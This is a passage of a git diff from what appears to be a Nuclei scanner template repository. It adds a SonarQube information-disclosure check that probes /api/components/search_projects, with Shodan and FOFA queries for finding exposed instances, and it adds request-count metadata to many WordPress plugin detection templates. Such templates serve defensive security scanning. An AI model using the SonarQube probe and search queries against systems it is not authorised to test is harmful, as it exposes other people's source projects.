b/http/misconfiguration/sonarqube-projects-disclosure.yaml @@ -0,0 +1,40 @@ +id: sonarqube-projects-disclosure + +info: + name: SonarQube - Information Disclosure + author: DhiyaneshDk + severity: medium + description: | + Information leakage vulnerability in an interface of SonarQube, you can download the source code through the tool. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/SonarQube/SonarQube%20search_projects%20%E9%A1%B9%E7%9B%AE%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md + - https://github.com/deletescape/sloot + metadata: + max-request: 1 + verified: true + shodan-query: title:"Sonarqube" + fofa-query: app="sonarQube-代码管理" + tags: sonarqube,exposure,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/api/components/search_projects" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"visibility":"public"' + - '{"organization' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/http/technologies/puppetdb-detect.yaml b/http/technologies/puppetdb-detect.yaml index 260f0187c8..99ade48498 100644 --- a/http/technologies/puppetdb-detect.yaml +++ b/http/technologies/puppetdb-detect.yaml @@ -26,10 +26,10 @@ http: words: - 'application/json' - - type: word + - type: regex part: body - words: - - '"version"' + regex: + - '"version"\s:\s"([0-9.]+)"' extractors: - type: regex diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 